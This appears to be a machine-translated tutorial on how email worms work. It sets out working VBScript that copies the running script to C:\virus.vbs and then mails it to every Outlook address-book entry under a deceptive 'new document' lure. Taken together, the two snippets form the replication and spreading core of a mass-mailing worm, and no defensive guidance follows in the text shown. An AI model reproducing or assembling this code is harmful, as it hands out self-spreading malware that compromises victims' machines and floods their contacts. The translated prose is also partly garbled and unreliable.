The principle of worm virus

Now the biggest threat to everyone's computer is the network worm virus! The damage of the network worm is simply astonishing, from the famous "Love Bug" to "Happy Time" to "Red Code", its destructive power is more and more strong, so we need to understand the network worm virus.

Worm virus and the general computer virus, it does not use its own copy attached to other programs in the way to copy themselves, so in the virus it is also an "alternative." The worm is very destructive, some worms can not only make waves on the Internet, the local area network has become their "play" stage-the worm can lurk in the client/server mode of the LAN Server software, when the client Access server, and the implementation of the toxic software download, The virus is "copied" from the server to the client computer without knowing it.

In fact, the scripting viruses are easy to make, and they all take advantage of the openness of the Windows system. In particular, COM to COM + 's component programming ideas, a script program can invoke more powerful components to complete their functions. Take the VB Script virus (such as happy time, I love you, Kournikova virus, homepage virus, etc.) for example, they are to add the. vbs script file in the attachment, the last use of *.htm.vbs and other deceptive file names. Let's take a look at some of the major features of the worm, and find out how to deal with the worm virus.

Worm virus has the ability to reproduce itself.

We take the common VB script as an example to see:

Set objFs=CreateObject （“Scripting.FileSystemObject”）
'创建一个文件系统对象
objFs.CreateTextFile （"C:\virus.txt", 1）
'通过文件系统对象的方法创建了一个TXT文件。
如果我们把这两句话保存成为.vbs的VB脚本文件，点击就会在C盘中创建一个TXT文件了。倘若我们把第二句改为：
objFs.GetFile （WScript.ScriptFullName）.Copy （"C:\virus.vbs"）

You can copy yourself to the C disk Virus.vbs this file. This sentence is preceded by opening this script file, Wscript.scriptfullname indicates that the program itself is a complete path file name. GetFile function to get this file, the copy function copies this file to the C-packing directory Virus.vbs this file. Such a simple two sentence to achieve the function of self-replicating, already have the basic characteristics of the virus-the ability to replicate themselves.

Second, the worm has a strong spread of

Viruses need to be spread, and the spread of e-mail viruses is undoubtedly transmitted through e-mail. The address book is pretty good for Outlook, but it also opens the door to the spread of viruses. Almost all e-mail viruses that are propagated through Outlook are completed with the same script attachment sent to the e-mail address stored in the Address book. Look at the following code:

Set objOA=Wscript.CreateObject （"Outlook.Application"）
'创建一个OUTLOOK应用的对象
Set objMapi=objOA.GetNameSpace （"MAPI"）
'取得MAPI名字空间
For i=1 to objMapi.AddressLists.Count
'遍历地址簿
Set objAddList=objMapi.AddressLists （i）
For j=1 To objAddList. AddressEntries.Count
Set objMail=objOA.CreateItem （0）
objMail.Recipients.Add （objAddList. AddressEntries （j））
'取得收件人邮件地址
objMail.Subject="你好!"
'设置邮件主题
objMail.Body="这次给你的附件，是我的新文档！"
'设置信件内容
objMail.Attachments.Add （“c:\virus.vbs"）
'把自己作为附件扩散出去
objMail.Send
'发送邮件
Next
Next
Set objMapi=Nothing
'清空objMapi变量，释放资源，值得学习的编程习惯
Set objOA=Nothing
'清空objOA变量

The function of this little piece of code is to send an e-mail message to the user in the Address book and spread itself as an attachment. The first line in this code is essential to create an object for Outlook. Under it is a loop that continuously sends the same message to the e-mail address in the Address Book. This is how the worm spreads.